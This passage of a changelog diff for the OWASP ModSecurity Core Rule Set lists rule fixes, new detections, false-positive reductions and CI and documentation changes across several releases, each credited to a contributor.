Bühler) +* Prevent bypass of rule 921130 (Amit Klein, Franziska Bühler) +* fix CVE msg in rules 944120 944240 (Fernando Outeda) +* Remove broken or no longer used files (Federico G. Schwindt) +* Make content-type case insensitive (Franziska Bühler) +* Move /util/docker folder from v3.3/dev branch to dedicated repo (Peter Bittner) +* feat(lint): split actions in linting and regression (Felipe Zipitria) +* Fix FP in 921120 (Franziska Bühler) +* Add missing OWASP_CRS tags (Christian Folini) +* Fix GHA badges (Federico G. Schwindt) +* feat(badge): add apache license badge +* fix typos found by fossies codespell (Tim Herren) +* Decrease processing time of rules (Ervin Hegedüs) +* handle multiple directives in 920510 (Andrea Menin) +* handle multiple directives in 920510 (Andrea Menin) +* fix(ci): use log_contains instead (Felipe Zipitria) +* Move test where it belongs (Federico G. 
Schwindt) +* fix(ci): use docker in DetectionOnly (Felipe Zipitria) +* fix(rule): remove dangling whitespace (Felipe Zipitria) +* fix(ci): run actions on .github change (Felipe Zipitria) +* fix(docs): update badges and links in readme (Felipe Zipitria) +* README: update repo link (Walter Hop) +* Update README: Copyright 2019 -> 2020 (Christian Folini) +* fix(ci): run tests also on PRs (Felipe Zipitria) +* fix(ci): change test name and fix default params (Felipe Zipitria) +* Restore Travis Status (was in the wrong repo) (Christian Folini) +* Remove outdated Travis status after migration (Christian Folini) +* feat(ci): adds github actions testing (Felipe Zipitria) +* fix(migration): post migration tasks (Felipe Zipitria) +* feat(templates): add text to gihub templates about migration. To be reverted after migation is done. (Felipe Zipitria) +* Added more explanations to comment of 920300 (Christian Folini) +* Added 'ver' action with current version to all necessary rules (Ervin Hegedus) +* Update nextcloud excl rules and shorten var (Franziska Bühler) +* Change to preferred lowercase var (Franziska Bühler) +* Set var to lowercase and change comment (Franziska Bühler) +* Resolve issue with allowed_request_content_types (Franziska Bühler) +* Allow REPORT requests without Content-Type header in Nextcloud (pyllyukko) +* Suppress rule 200002 when editing contacts in Nextcloud (pyllyukko) +* XenForo: update exclusions (Walter Hop) +* WordPress: exclude additional URL fields in profile editor (Walter Hop) +* add www to link (NullIsNot0) +* Fix link for 941310 Old link does not work anymore. Change it to new one. 
(NullIsNot0) +* Add Content-Type: multipart/related as allowed default (jeremyjpj0916) +* Resolve issue 1722 and fix content-type whitelisting (Franziska Bühler) +* make severities and scores consistent (Walter Hop) +* add QQGameHall UA (#1731) (Andrea Menin) +* another test (Allan Boll) +* Add word boundaries around values in SQL tautologies (942130) (Allan Boll) +* Move tests to their own file, while here also correct permissions for 920180. (Federico G. Schwindt) +* Rule to check if both C-L and T-E are present (#1310) (Federico G. Schwindt) +* Fixes for 2 tests in 921200 (Christian Folini) +* XenForo: add exclusions, remove unnecessary chains (#1673) (Walter Hop) +* Fix FPs for 942350 (#1706) (Franziska Bühler) +* Fix typos found by codespell / Fossies project (#1702) (Simon Studer) +* Ignore check of CT header in POST request if protocol is HTTP/2 (Ervin Hegedus) +* Narrowing down the subpattern .*? in 941130 (Christian Folini) +* Restricting a wide regex a bit (Christian Folini) +* Drop escapes (Christian Folini) +* Fix FP in 941130 and rearrange regex with new regex-assemble file (Christian Folini) +* Ignore check of CT header in POST request if protocol is HTTP/2 (Ervin Hegedus) +* Remove trailing dot in several msg actions (#1678) (Tim Herren) +* Replace REQUEST_BODY with ARGS on 930100 and 930110 (#1659) (Andrea Menin) +* Temporary travis workaround to buy time and fix it for good (#1684) (Andrea Menin) +* Add regression tests (Franziska Bühler) +* Fix FP with create with 942360 (Franziska Bühler) +* Avoid embedded anchors in CRS rule 942330 (Allan Boll) +* Update 942450 for less false positives, more tests (#1662) (Will Woodson) +* Ensure single ranges are also checked (#1661) (Federico G. Schwindt) +* WordPress: also exclude posts/pages endpoint in subdirectories (Walter Hop) +* For bugs, also ask for the environment (#1657) (Federico G. 
Schwindt) +* XenForo: fix incorrect escape (Walter Hop) +* XenForo: additional exclusions (Walter Hop) +* Pattern cleanup across several rules (#1643). Drop unneeded non-capture groups; No need to escape "-" outside character classes And only if it is not at the end. (Federico G. Schwindt) +* Improve rule 941350: Previously, this rule will also match on the equivalent to "<..<". Rewrite it so it is only triggered by the equivalent to "<..>", simplifying the pattern quite a bit as a bonus. While here add a link describing the bypass for future reference. +* Fix test Was using the equivalent to "<...<" instead of "<...>". (Federico G. Schwindt) +* Move the help and support link to contacts (#1647) While here rename to ensure they are presented in the right order and minor cosmetics. (Federico G. Schwindt) +* Move remaining regression test data file to new folder, cleanup README (#1646) (Peter Bittner) +* Also ask for the paranoia level (Federico G. Schwindt) +* Make it a tiny bit more colorful (Federico G. Schwindt) +* Spacing (Federico G. Schwindt) +* Fix emoji (Federico G. Schwindt) +* Switch to multiple templates for github issues (#1644) (Federico G. Schwindt) +* Fix paranoia-level log description (Andrea Menin) +* change IRC to Slack (Walter Hop) +* fix spacing (Walter Hop) +* Moving tests and documentation folders (#1627) (Soufiane Benali) +* add triggered rule (#1636) (Andrea Menin) +* Drop the translate header from the restricted list Fixes #1410. (Federico G. Schwindt) +* Mark stale issues (Federico G. Schwindt) +* Added support for >). Use negated classes for better performance. (Federico G. Schwindt) +* Add test for issue #1580 (#1612) (Federico G. Schwindt) +* removes t:lowercase (Andrea Menin) +* Move integration tests to their own job (#1608) Also cleanup branches' list. (Federico G. Schwindt) +* Add PL1 tag. 
(Anna Winkler) +* Change version number for full version name (Felipe Zipitria) +* Better document legacy conversion procedure Add text with instructions for a simple conversion utility. (Felipe Zipitria) +* Correct example text regarding GeoIP. Add maxmind tool for downloading files (Felipe Zipitria) +* Ignore configuration files generated by the JetBrains editors (Anna Winkler) +* Update name of branch to use for feature branches. Minor syntax updates. (Anna Winkler) +* Minor optimisation (Emile-Hugo SPIR) +* Also fix the `as herefrom` pattern (Emile-Hugo SPIR) +* More conservative fix (Emile-Hugo SPIR) +* Update the source file (Emile-Hugo SPIR) +* Fix a FP (`, aside from`) (Emile-Hugo SPIR) +* regression fix for #1581 (emphazer) +* Change order to check ip first in both rules (Felipe Zipitria) +* Change chain order (Felipe Zipitria) +* Fix spacing in text (Felipe Zipitria) +* Add link to mailing list archives (Felipe Zipitria) +* Adding new test for 941150 based on XSS cheatsheet by portswigger (Christian Folini) +* Adding new test for 941340 based on XSS cheatsheet by portswigger (Christian Folini) +* Adding new test for 941280 based on XSS cheatsheet by portswigger (Christian Folini) +* Adding new test for 941170 based on XSS cheatsheet by portswigger (Christian Folini) +* Adding new test for 941250 based on XSS cheatsheet by portswigger (Christian Folini) +* Adding new test for 941220 based on XSS cheatsheet by portswigger (Christian Folini) +* Adding new test for 941330 based on XSS cheatsheet by portswigger (Christian Folini) +* Adding new test for 941300 based on XSS cheatsheet by portswigger (Christian Folini) +* Adding new test for 941230 based on XSS cheatsheet by portswigger (Christian Folini) +* Adding new test for 941260 based on XSS cheatsheet by portswigger (Christian Folini) +* Adding new test for 941290 based on XSS cheatsheet by portswigger (Christian Folini) +* Adding new test for 941270 based on XSS cheatsheet by portswigger (Christian 
Folini) +* Adding new test for 942180 based on XSS cheatsheet by portswigger (Christian Folini) +* Update mailing list links to google group (Felipe Zipitria) +* Fix typo and add 2 new entries to 941160 (Franziska Bühler) +* Switch to dates in YYYY-MM-DD format IOW iso 8601. While here add newlines and drop empty categories. (Federico G. Schwindt) +* Update badges, add v3.3 and remove v3.0 (#1557) (Federico G. Schwindt) +* Rearange characters and add positive and negative test cases. Moved the dash to the end of the character set to avoid escaping it. Added test with all the new characters and a test for multiple whitespaces. Allowed a previously blocked charset. (Tim Herren) +* 920470: include chars from rfc 2046 RFC 2046 allows additional chars for the boundary. \d removed as it is covered by \w in the regex. Removed unnecessary escapes. (Tim Herren) +* Fix bypass in 931130 Don't rely on beginsWith as it might allow attackers to create subdomains matching the prefix. Add tests to cover this and other cases. The latter fixes #1404. (Federico G. Schwindt) +* fix rule regex due to remove t:removeComments (Andrea Menin) +* 920470: include chars from rfc 2046 RFC 2046 allows additional chars for the boundary. \d removed as it is covered by \w in the regex. Removed unnecessary escapes. 
(Tim Herren) +* update Dockerfiles and Travis to use v3.3/dev (Walter Hop) + +## Version 3.2.0 - 2019-09-24 + +New functionality: + +* Add AngularJS client side template injection 941380 PL2 (Franziska Bühler) +* Add docker-compose.yaml and example rule exclusion files for docker-compose (Franziska Bühler) +* Add extended access.log format to Docker (Franziska Bühler) +* Add libinjection check on last path segment (Max Leske, Christian Folini) +* Add PUBLIC identifier for XML entities (#1490) (Rufus125) +* Add .rdb to default restricted_extensions (Walter Hop) +* Add .swp to default restricted_extensions (Andrea Menin) +* Add rule 933200 PHP Wrappers (Andrea Menin) +* Add send-payload-pls.sh script to test payload against multiple paranoia levels (Christian Folini, Manuel Spartan) +* Add support for shell evasions with $IFS (Walter Hop, Chaim Sanders) +* Add unix-shell commands (Christoph Hansen, Chaim Sanders) +* Also inspect the path for the script tag (Federico G. Schwindt) +* Detect 80legs, sysscan, Gobuster scanners (Brent Clark) +* Detect CGI source code leakages (Christoph Hansen, Walter Hop) +* Detect 'crawler' user-agent (Federico G. Schwindt) +* Detect Jorgee, Zgrab scanners (Walter Hop) +* Detect MySQL in-line comments (Franziska Bühler) +* Detect Wappalyzer scanner (Christian Folini, Chaim Sanders) +* Java RCE: Add struts namespaces (Walter Hop) +* Java RCE: Detect more java classes (Manuel Leos) +* Javascript: Add 941370 preventing a bypass for 941180 (Andrea Menin) +* Make CRS variables configurable in Docker image (Franziska Bühler) +* New PL3 rule 920490 to protect against content-type charset bypassing (Christian Folini) +* Node.js unserialization + javascript RCE snippets (Walter Hop) +* Request smuggling: Also cover pre http/1.0 requests (Federico G. 
Schwindt) +* Restricted files: Added many dotfiles (Dan Ehrlich) +* SQLi bypass detection: ticks and backticks (Franziska Bühler) +* XenForo rule exclusion profile (Walter Hop) + +Removed functionality: + +* Remove unused protected_uploads setting from setup (Walter Hop) +* Remove deprecated tx.msg and tx.%{rule.id}-... (Federico G. Schwindt) +* Remove deprecated upgrade script (Walter Hop) + +Improved compatibility: + +* Add OWASP_CRS tags for ModSec 3 changes and replace ruleRemoveTargetByTag arguments (Ervin Hegedus) +* Replace @contain % with @rx 25; ModSec 3 fails to parse % by itself (or escaped). (Federico G. Schwindt) +* RE2 compatibility for 941130, 920220, 920240, 920230, 920460, 942200, 942370 (Allan Boll) +* Hyperscan compatibility and simplification for 942450 (Allan Boll) + +Fixes and improvements: + +* 932140: fix ReDoS in FOR expression (Walter Hop) +* 933200: Simplify pattern (Federico G. Schwindt, Andrea Menin) +* 941380: fix anomaly score variable (Franziska Bühler) +* 942510, 942511: fix anomaly score variable (Walter Hop) +* Add content-type application/csp-report (Andrea Menin) +* Add content-type application/xss-auditor-report (Andrea Menin) +* Add CRS 3.2 Badge build support. (Chaim Sanders) +* Add CVE numbers for Apache Struts vulnerabilities to comments in rules (Franziska Bühler) +* Add CVE-2018-11776 to comments of 933160 and 933161 (Franziska Bühler) +* Add CVE-2018-2380 to comments of rules (Franziska Bühler) +* Add default env vars for anomaly scores in Docker (Franziska Bühler) +* Add missing OWASP_CRS tags to 921xxx rules (Walter Hop) +* Add REQUEST_FILENAME to rule id 944130 and add exploits to comment (Franziska Bühler) +* Add spaces in front of closing square brackets (Franziska Bühler) +* Add travis changes (#1316) (Chaim Sanders) +* Allow dot characters in Content-Type multipart boundary (Walter Hop) +* Also handle dot variant of X_Filename. PHP will transform dots to underscore in variable names since dot is invalid. 
(Federico G. Schwindt) +* As per the ref manual, it is compressWhitespace (Federico G. Schwindt) +* Avoid php leak false positive with WOFF files (Manuel Spartan) +* Bring back CRS 2.x renumbering utility (Walter Hop) +* Clean up travis and reorg (Federico G. Schwindt) +* Code cosmetics: reorder the actions of rules (Ervin Hegedus) +* Content-Type is case insensitive (Federico G. Schwindt) +* Disassembled 941160 (Franziska Bühler) +* Drop separate regexp files. They are not really needed and save us from updating multiple places. (Federico G. Schwindt) +* Drop t:lowercase from 941350 (Federico G. Schwindt) +* Drop unneeded capture groups and tidy up (Federico G. Schwindt) +* Drop unneeded capture groups and tidy up regexps (Federico G. Schwindt) +* Drop unneeded unicode from 941110. Add tests to cover a few more variants as well as a negative test (Federico G. Schwindt) +* Fix 920440 "URL file extension is restricted by policy" regex (Andrea Menin) +* Fix 920460 test (Federico G. Schwindt) +* Fix 942101 and 942460 by adding to sqli_score variable (Christian Folini) +* Fix checking the existence of 'HTTP' trailing request verb and request path in the payload for HTTP request smuggling; decreases false-positives on free-form text. (Yu Yagihashi) +* Fix commit default for non 2.9 branch (Chaim Sanders) +* Fix CRS2->CRS3 mapping table (973344 -> 941100) (Chaim Sanders) +* Fix date (Chaim Sanders) +* Fix Docker image SSL support (Franziska Bühler) +* Fix duplicate .env (jschleus, Chaim Sanders) +* Fix executing paranoia level counters (Christian Folini) +* Fix indentation and python version in crs2-renumbering script (Chaim Sanders) +* Fix input / headers misordering (Christian Folini) +* Fix path traversal attack pattern at id:930110 (Ervin Hegedus) +* Fix regexp in Docker image (Franziska Bühler) +* Fix regexp with incorrect dot '.' escape in rule 943120 (XeroChen) +* Fix request header Sec-Fetch-User false positive (na1ex) +* Fix runaway regexp in 942260. 
Add variant regexp assemble script to handle possessive qualifiers. Use possessive qualifiers to tight this up and solve ReDoS problem. (Federico G. Schwindt) +* Fix small typo in variable (Felipe Zipitria) +* Fix spelling error in variable name (supplient) +* Fix transform name pointed out by secrules_parsing (Federico G. Schwindt) +* Fix Travis Merge not being able to find HEAD (Chaim Sanders) +* Fix vulnerable regexp in rule 942490 (CVE-2019-11387) (Christoph Hansen) +* Fix wrong regex, assembly result, in 942370 (Franziska Bühler) +* INSTALL: advise to use release zips, remove upgrade.py, update Nginx (Walter Hop) +* Java: change tag from COMMAND_INJECTION to JAVA_INJECTION (Manuel Spartan) +* Jwall auditconsole outbound anomaly scoring requirements (Christoph Hansen) +* Mark patterns not supported by re2 (Federico G. Schwindt) +* Move duplicated 900270 to 900280 Fixes #1236. (Federico G. Schwindt) +* Move PROXYLOCATION var (Franziska Bühler) +* PHP: move get_defined_functions() and friends into PL1 (Walter Hop) +* Pin the ftw version to 1.1.7 for now (Federico G. Schwindt) +* Prevent bypass 933180 PHP Variable Function (Andrea Menin) +* Reduce comments, introduction of triggered exploits (Franziska Bühler) +* Remove all trailing spaces from ftw yaml test files (Ervin Hegedus) +* Remove auditlog No other rules specify it. Add missing quotes and drop rev (Federico G. Schwindt) +* Remove capture, remove tx.0, add transformation functions, fix regex, add presentation link (Andrea Menin) +* Remove old and unwanted setvar constructs (Federico G. Schwindt) +* Remove superfluous comments (Walter Hop) +* Remove superfluous pmf (Federico G. Schwindt) +* Remove t:lowercase from 920490 (Christian Folini) +* Remove WARNING from php-errors.data (Andrea Menin) +* Reorder actions (Federico G. 
Schwindt) +* Replacing all @pmf with @pmFromFile (Christian Treutler) +* Restricted-files.data: add AWS config (Walter Hop) +* SQLI: removed unnecessary + (Christoph Hansen) +* Switch Docker image to owasp/modsecurity:2.9-apache-ubuntu (Federico G. Schwindt) +* unix-shell.data: fix typo in 'more' (Walter Hop) +* Update .travis.yml Update to support v3.1 (Chaim Sanders) +* Update dockerfile to always use 3.2/dev (Federico G. Schwindt) +* Update OWASP CRS Docker image to support the new upstream and 2.9.3 (Peter Bittner, Chaim Sanders) +* Update RESPONSE-950-DATA-LEAKAGES.conf (Christoph Hansen) +* Update RESPONSE-959-BLOCKING-EVALUATION.conf (Christoph Hansen) +* Wordpress: add support for Gutenberg editor (siric_, Walter Hop) +* Wordpress: allow searching for any term in admin posts/pages overview (Walter Hop) +* WordPress: exclude Gutenberg via rest_route (Walter Hop) +* WordPress: exclude some more profile.php fields from RFI rule (Walter Hop) +* WordPress: exclude SQL comment rule from _wp_http_referer (Walter Hop) +* XML Soap Encoding fix 920240 (Christoph Hansen) + +Unit tests: + +* 932140: add regression tests (Walter Hop) +* 933180: fix tests which were doing nothing (Walter Hop) +* 941370: add some more tests, fix whitespace (Walter Hop) +* Add more tests for 941130 (Christian Folini) +* Add regression test for 941101 (Avery Wong) +* Add regression tests for 942150, 942100, 942260 (Christian Folini) +* Add regression tests to 941160 (Franziska Bühler) +* Add some regression tests (Ervin Hegedus) +* Add testing support for libmodsecurity running on Apache and Nginx (Chaim Sanders) +* Add tests for 941360 that fights JSFuck and Hieroglyphy (Christian Folini) +* Add tests for rule 921110 (Yu Yagihashi) +* Added regression tests for rules 942320, 942360, 942361, 942210, 942380, 942410, 942470, 942120, 942240, 942160, 942190, 942140, 942490, 942120 (Christoph Hansen) +* Drop tests for removed rules (Federico G. 
Schwindt) +* Fix failing regression tests (Ervin Hegedus) +* Fix failing tests (Manuel Spartan, Chaim Sanders) +* Fix readme typos in example rule (Walter Hop) +* Fix test 941110-2 (Federico G. Schwindt) +* Fix YAML 1.2 compliance with "true" (Federico G. Schwindt) +* RCE: Add tests for the for command (Federico G. Schwindt) +* Update regression tests for rules 931110, 931120, 931130 (Simon Studer) + +Documentation: + +* Add details to README for Dockerhub (Franziska Bühler) +* Add intro/comment to CVE comments (Franziska Bühler) +* CONTRIBUTING: add note about separate PRs (Walter Hop) +* Erased gitter chat. Added CII badge (Felipe Zipitria) +* Replaced descriptions (Christian Folini) +* Summarized authors on single line in tests for 941160 (Christian Folini) +* Update broken link in regexp-assemble blog URLs (Walter Hop) +* Update CONTRIBUTING.md To base changes on v3.2/dev. (Felipe Zipitría) +* Update CONTRIBUTORS order (Andrea Menin) +* Update README.md (Rufus125) +* Updating crs site location (Chaim Sanders) + +## Version 3.1.1 - 2019-06-26 + +* Fix CVE-2019-11387 ReDoS against CRS on ModSecurity 3 at PL 2 (Christoph Hansen, Federico G. Schwindt) +* Content-Type made case insensitive in 920240, 920400 (Federico G. Schwindt) +* Allow % encoding in 920240 (Christoph Hansen) +* Fix bug in 920440 (Andrea Menin) +* Fix bug in 920470 (Walter Hop) +* Reduce false positives in 921110 (Yu Yagihashi, Federico G. Schwindt) +* Fix bug in 943120 (XeroChen) + +## Version 3.1.0 - 2018-08-07 + +* Add Detectify scanner (Andrea Menin) +* Renaming matched_var/s (Victor Hora) +* Remove lines with bare '#' comment char (Walter Hop) +* Drop the XML variable from rule 932190 (Federico G. Schwindt) +* Update outdated URLs (Walter Hop) +* remove unused rule 901180 (Walter Hop) +* Drop exit from unix and windows RCE (Federico G. Schwindt) +* Fix anomaly_score counters (Federico G. 
Schwindt) +* Remove mostly redundant 944220 in favor of 944240 (Christian Folini) +* Add self[ and document[ to rule 941180 (Andrea Menin) +* Provide proxy support within CRS docker image (Scott O'Neil) +* Prevent bypass in rule 930120 PL3 (Andrea Menin) +* Fix small typo in variable (Felipe Zipitría) +* Fix bug #1166 in Docker image (Franziska Bühler) +* Remove revision status from rules (Federico G. Schwindt) +* Add template for issues (Federico G. Schwindt) +* Correct failing travis tests in merge situations (Federico G. Schwindt) +* Remove unused global variable in IIS rules (Chaim Sanders) +* Refactor to use phase number instead of name (Federico G. Schwindt) +* Add uploaded file name check; refresh LFI / filename checks (Walter Hop) +* Introduce critical sibling of 920340 in PL2 (Walter Hop) +* Fix bypass caused by multiple spaces in RCE rules (Walter Hop) +* Remove unneeded regex capture groups (Federico G. Schwindt) +* Add built-in exceptions for CPanel (Christoph Hansen) +* Add additional file restrictios for ws_ftp, DS_Store... 
(Jose Nazario) +* Fix missing strings in 942410 (Franziska Bühler) +* Add 2 missing PDO errors (Christoph Hansen) +* Fix issues with FPs in regression tests (Chaim Sanders) +* Add Nextcloud client exclusion support (Christoph Hansen) +* Fix spelling mistakes in REQUEST-942- (Padraig Doran, Chaim Sanders) +* Explicitly ignore the user defined rules (Aaron Haaf, Chaim Sanders) +* Add regression tests for 942490 (Christoph Hansen, Chaim Sanders) +* Add Owncloud client exclusion support (Christoph Hansen, Christian Folini) +* Adding 'F-Secure Radar' vulnerability scanner UA (Christian Folini, Chaim Sanders) +* Update DockerFile to use Ubuntu as base (Chaim Sanders) +* False positives 942360: move alter and union (Franziska Bühler, Chaim Sanders) +* Add support for Java style attacks (Manuel Spartan, Walter Hop) +* Fix various regression tests issues caused by webserver handling (azhao155, Chaim Sanders) +* Update TravisCI to build on a per PR basis (Chaim Sanders) +* Optimized rule 921160 and regex (Allan Boll, Chaim Sanders) +* Update the consistency across various files (Federico G. Schwindt) +* Add missing transform, 944120 sibling 944240 (Manuel Spartan) +* Fix false positive for 'like' in 942120 (Walter Hop) +* Add regression tests for Java Rules (Manuel Spartan) +* Fixup and small reorg of dokuwiki rule exclusion package (Christian Folini) +* Make TravisCI tests fail if Apache can't load rules (Felipe Zipitría) +* Add exclusion rules for Dokuwiki (Matt Bagley, Christian Folini) +* Initial exclusions for NextCloud installs (Matt Bagley, Christian Folini) +* Added struts-pwn UA to list (Manuel Spartan) +* Uses MULTIPART_MISSING_SEMICOLON instead of MULTIPART_SEMICOLON_MISSING (Felipe Zimmerle) +* Add file upload checks (Manuel Spartan) +* Check if Transfer-Encoding is missing (Federico G. Schwindt, Christian Folini) +* Remove duplicated variables (Federico G. 
Schwindt) +* Reduce FP by splitting classic SQL injection rule 942370 (Christoph Hansen) +* Fix typo in REQUEST-920-PROTOCOL-ENFORCEMENT (ihacku, Franziska Bühler) +* Add configurable timestamp format to FTW integration (Christian Folini) +* Add badges to README (Felipe Zipitría) +* Add clarifying comments to 910110 (Christian Folini) +* Making rule 933131 case-insensitive (Manuel Spartan) +* Merge and reorder rules as part of cleanup (Federico G. Schwindt) +* Update copyright date and syntax (Jose Nazario, Felipe Zipitría) +* Updated SecMarker and SkipAfter names to use meet guidelines (Felipe Zipitría) +* Tidy up single quotes and other guidelines updates (Felipe Zipitría) +* Syntax fix for setvar crs_exclusions_wordpress (Manuel Spartan) +* Updated various contributors to developers (Christian Folini) +* Revise SQL rules by disassembling them into their core protections (Franziska Bühler) +* Add an example payload to 920220 (coolt) +* Add a missing regex to rule 942310 (Franziska Bühler) +* Detect GET or HEAD with Transfer-Encoding header (Federico G. Schwindt) +* Fix broken links in references (Pásztor Gábor) +* Add contributing guidelines (Felipe Zipitría) +* Fix processing bypasses in rule 931130 (Felipe Zipitría, Christian Folini) +* Correct small omissions in unix-shell.data (Walter Hop) +* Add IIS specific detection to LFI-os-files.data (Manuel Spartan) +* Update examples to match the current cleanup (Federico G. Schwindt) +* Corrected the ordering of actions to meet guidelines (Felipe Zipitría) +* Remove unused capture groups (Federico G. Schwindt) +* Use explicit rx operator (Federico G. Schwindt) +* Update the RCE regular expressions(Walter Hop, Federico G. 
Schwindt) +* Removing maturity & accuracy from rules (Felipe Zipitría) +* Increasing range header (Christoph Hansen) +* Fixed upgrade.py script argument options (Glyn Mooney) +* Updating to reflect OWASP flagship status (Chaim Sanders) +* Adding Docker support for CRS (Chaim Sanders) +* Initial Travis deployment (Zack Allen, Walter Hop) +* Initial commit of regression tests (Chaim Sanders, Walter Hop) +* Remove test for 921170 because it won't ever fire (Chaim Sanders, Walter Hop) +* Update minor incorrectness in asp.net regex (Chaim Sanders, Walter Hop) +* Add notification for builds against #modsecurity on freenode (Zack Allen, Walter Hop) +* Add all past code contributors and convert to markdown (Walter Hop) +* Block uploads of files with .phps extension (Walter Hop) +* Improve message for script upload with superfluous extension (Walter Hop) +* Remove trailing whitespace in various regexs (Walter Hop) +* Add command popd to direct unix rce list in rule 932150 (Franziska Bühler) +* Remove unnecessary END_XSS_CHECKS marker (Christian Folini) +* Ignore Whitespaces in Rule 942110 (Christoph Hansen) +* Update missing RCE Commands (Umar Farook) +* Update lfi-os-files.data (Umar Farook) +* Removed deprecated t:removeComments from 942100 (Christian Folini) +* Add word boundary to rule 942410 (Franziska Bühler) + +## Version 3.0.2 - 2017-05-12 + +* Remove debug rule that popped up in 3.0.1 (Christian Folini) + +## Version 3.0.1 - 2017-05-09 + +* SECURITY: Removed insecure handling of X-Forwarded-For header; + reported by Christoph Hansen (Walter Hop) +* Fixed documentation errors in RESPONSE-999-... 
(Chaim Sanders) +* Reduced FPs on 942190 by adding a word boundary to regex (Franziska Bühler) +* Reduced FPs on 932150 by removing keyword reset (Franziska Bühler) +* Tidied exceptions in 930100 (Roberto Paprocki) +* Reduced FPs for 920120 by splitting into stricter sibling (Franziska Bühler) +* Simplified some Drupal rule exclusions (Damien McKenna, Christian Folini) +* Extended KNOWN_BUGS with remarks on JSON support on Debian (Franziska Bühler) +* Updated README to add gitter support (Chaim Sanders) +* Clarified DoS documentation for static extensions (Roberto Paprocki) +* Added application/octet-stream to allowed content types (Christian Folini) +* Typo in 942220 alert message (Chaim Sanders, @bossloper) +* Moved referrer check of 941100 into new PL2 rule (Franziska Bühler) +* Closed multiple @pmf evasions via lowercase transformation (Roberto Paprocki) +* Clarified libinjection bundling in INSTALL file (@cjdp) +* Reduced FPs via Wordpress Rule Exclusions (Walter Hop) +* Support for RFC 3902 (Content Type application/soap+xml; Christoph Hansen) + Make sure you update ModSecurity recommended rule 200000 as well. 
+* Bugfix in 942410 regex (Christian Folini)
+* Reduced FPs for 942360 (Walter Hop)
+* Reduced FPs for 941120 by restricting event handler names (Franziska Bühler)
+* Extended 931000 with scheme "file" to fix false negative (Federico Schwindt)
+* Extended 905100 and 905110 for HTTP/2.0 (includes bugfix, Christoph Hansen)
+* Moved 941150 from PL1 to PL2; includes Bugfix for rule (Christian Folini)
+* Updated documentation for 920260 (Chaim Sanders)
+* Bugfix in upgrade.py (Victor Hora)
+* Fixed FP in RCE rule 932140 (Walter Hop)
+* Fixed comment for arg limit check rule 920370 (Christian Folini)
+* Created CONTRIBUTORS file
+* Added Christoph Hansen (emphazer) to CONTRIBUTORS file
+* Added Franziska Bühler (Franziska Bühler) to CONTRIBUTORS file
+* Fixed bug with DoS rule 912160 (@loudly-soft, Christian Folini)
+
+## Version 3.0.0 - 2016-11-10
+
+Huge changeset running in separate branch from September 2013 to September 2016.
+This is a cursory summary of the most important changes:
+
+* Huge reduction of false positives (Ryan Barnett, Felipe Zimmerle, Chaim
+ Sanders, Walter Hop, Christian Folini)
+* Anomaly scoring is the new default, renamed thresholds from
+ tx.(in|out)bound_anomaly_score_level to
+ tx.(in|out)bound_anomaly_score_threshold
+* Introduction of libinjection for SQLi detection
+* Introduction of libinjection for XSS detection
+* Big improvement on detection of Remote Command Execution (Walter Hop)
+* Big improvement on PHP function name detection (Walter Hop)
+* Paranoia Mode (Christian Folini, Noël Zindel, Franziska Bühler,
+ Manuel Leos, Walter Hop)
+* Shifted dozens of rules into higher paranoia levels
+* Introduced a lot of stricter sibling rules in higher levels
+* Generic mechanism to support application specific rule exclusions
+ (Chaim Sanders)
+* Initial Wordpress rule exclusions (Walter Hop)
+* Initial Drupal rule exclusions (Christian Folini, @emphazer)
+* Renumbering of rules.
See folder id_renumbering for a
+ csv map (Chaim Sanders)
+* Consolidation of rules, namely XSS and SQLi (Spider Labs/Trustwave team)
+* Sampling mode / Easing in (Christian Folini)
+* Cleanup of reputation checks / persistent blocking
+ (Christian Folini / Walter Hop)
+* Tags much more systematic (Walter Hop)
+* IP reputation checks / persistent blocking of certain clients
+ (Spider Labs/Trustwave team)
+* Phase actions use request/response/logging now instead of
+ numerical phases (Spider Labs/Trustwave team)
+* Added NoScript XSS Filters (Spider Labs/Trustwave team)
+* Updated "severity" action to use words (CRITICAL, WARNING, etc...)
+ vs. numbers (5, 4, etc..)
+* Various regex fixes after research by Vladimir Ivanov (Chaim Sanders)
+* Overhaul of the regression mode into debug mode (Walter Hop, Ryan Barnett)
+* Introduction of util/upgrade.py (Walter Hop)
+* Removal of GeoIP database. Download via util/upgrade.py now.
+* Introduction of Initialization rules with
+ default values (Walter Hop, Christian Folini)
+* Sorting out terminology with
+ whitelisting and rule exclusions (Christian Folini)
+* Overhaul of testing (Chaim Sanders)
+* Protection from HTTP Parameter Pollution (Franziska Bühler)
+* Simplification of setup config file, renamed file to crs-setup.conf.example
+* Improved session fixation detection logic (Christian Peron, credits to
+ Eric Hodel for the discovery)
+* Updated list of malicious webscanners
+* Splitting scanner user agents data files (github user @ygrek)
+* Countless bugfixes in severities, anomaly scores, tags, etc.
+ across the board
+* Cleanup of formerly experimental DDoS rules,
+ fix documentation (Ryan Barnett, Christian Folini)
+* Improves http blacklist checks (Walter Hop)
+* Extended XSS detection (as suggested by Mazin Ahmed)
+* Added support for Travis CI
+* Added support for HTTP/2 in recent Apache 2.4 (Walter Hop)
+* Added many, many bots and scanners (among others suggested by
+ github user @toby78, @jamuse, Matt Koch)
+* Fixed mime types suitable for XML processor (Chaim Sanders)
+* Include script in util/join-multiline-rules to work around
+ Apache 2.4 < 2.4.11 bug with long lines (Walter Hop)
+* New detection for request smuggling attacks (Achim Hofmann,
+ Christian Folini)
+* Fixes with project honeypot setup (Ryan Barnett)
+* Separated DB / SQL messages by DB software (Ryan Barnett)
+* CPanel integration (Chaim Sanders)
+* Introduction of var for static resources (Chaim Sanders)
+* Many improvements to rules in 2014/5 (Ryan Barnett)
+
+## Version 2.2.9 - 2013-09-30
+
+Improvements:
+
+* Updated the /util directory structure
+
+Bug Fixes:
+
+* fix 950901 - word boundary added
+* modsecurity_35_bad_robots.data - gecko/25 blocks Firefox Android
+
+
+## Version 2.2.8 - 2013-06-30
+
+Improvements:
+
+* Updatd the /util directory structure
+* Added scripts to check Rule ID duplicates
+* Added script to remove v2.7 actions so older ModSecurity rules will work
+ *
+* Added new PHP rule (958977) to detect PHP exploits (Plesk 0-day from king cope)
+ *
+ *
+
+Bug Fixes:
+
+* fix 950901 - word boundary added
+ *
+* fix regex error
+ *
+* Updated the Regex in 981244 to include word boundaries
+ *
+* Problem with Regression Test (Invalid use of backslash) - Rule 960911 - Test2
+ *
+* ModSecurity: No action id present within the rule - ignore_static.conf
+ *
+* "Bad robots" rule blocks all Java applets on Windows XP machines
+ *
+* duplicated rules id 981173
+ *
+
+## Version 2.2.7 - 2012-12-19
+
+Improvements:
+
